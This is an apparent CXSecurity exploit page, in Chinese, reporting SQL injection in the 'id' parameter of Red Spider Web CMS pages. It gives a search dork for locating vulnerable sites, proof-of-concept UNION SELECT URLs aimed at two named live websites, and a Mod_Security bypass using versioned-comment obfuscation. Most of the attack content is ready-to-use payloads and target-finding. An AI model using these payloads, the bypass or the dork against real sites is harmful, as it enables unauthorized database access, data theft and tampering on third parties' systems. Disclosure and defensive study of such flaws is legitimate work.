R.s.W - SQL注入 - CXSecurity.com

首页 Bugtraq

完整列表

仅Bug 仅技巧仅漏洞利用仅Dork 仅CVE 仅CWE

虚假公告

排名

CVEMAP

完整列表

显示供应商显示产品

CWE字典

检查CVE ID 检查CWE ID

搜索

Bugtraq

CVEMAP

按作者

CVE ID CWE ID

按供应商按产品

RSS

Bugtraq

CVEMAP CVE产品

漏洞漏洞利用 Dork

cIFrex

Facebook Twitter

捐赠

关于

提交

R.s.W - SQL注入

2025.12.14 作者： Itqchi

风险等级： 中

本地： 否

远程： 是

CVE： 未分配

CWE： 未分配

Dork： “Developed by Red Spider Web”

# 漏洞标题： SQL注入 – Red Spider Web CMS # 日期： 2025-12-11 # 漏洞作者： ITACHI - SELI # 类别： Web应用程序 # 测试于： Windows 10 / Kali Linux CVE： 未分配

## 摘要： 在多个使用Red Spider Web CMS开发的网站中发现了一个SQL注入漏洞。该问题存在于project.php、pic.php和gallery.php等页面的"id"参数中，用户输入未经过适当清理。

### 漏洞证明： https://www.jbshowrah.com/project.php?id=47'/!50000UNION/_///!50000SELECT/_// database(),2,3–+ https://www.oarindia.org/gallery.php?id=1

#### WAF： Mod_Security ##### WAF绕过： /!50000UNION/

### 漏洞详情： id参数未经验证直接传递到SQL查询中。添加特殊字符（例如，’）会触发SQL错误，从而确认注入漏洞。

示例测试输入： ?id=-1’ ## 影响： 数据库信息泄露可能的身份验证绕过数据操纵或删除潜在的完整数据库泄露

参考： ITACHI – SELI 电报： @ir_itachi_ir

频道： https://t.me/IR_ITACHI_1_UCHIHA_IR 频道： https://t.me/Selii_404 邮箱： IRITACHIUCHIHAIR@GMAIL.COM

在RAW版本中查看此公告

为此漏洞投票：

     1
   0

100% 0%

感谢您的投票！

感谢您的评论！您的消息已进入48小时隔离区。

在此评论。

昵称 (*)

邮箱 (*)

视频

文本 (*)

(*) - 必填字段。取消提交

显示所有评论

返回顶部

深度剖析Red Spider Web CMS SQL注入漏洞与WAF绕过技术

本文详细披露了Red Spider Web CMS中存在的SQL注入漏洞，漏洞位于project.php等页面的id参数。文章提供了漏洞利用方法、WAF（Mod_Security）的绕过技巧，并分析了可能造成的数据库信息泄露、身份验证绕过等严重影响。

R.s.W - SQL注入 - CXSecurity.com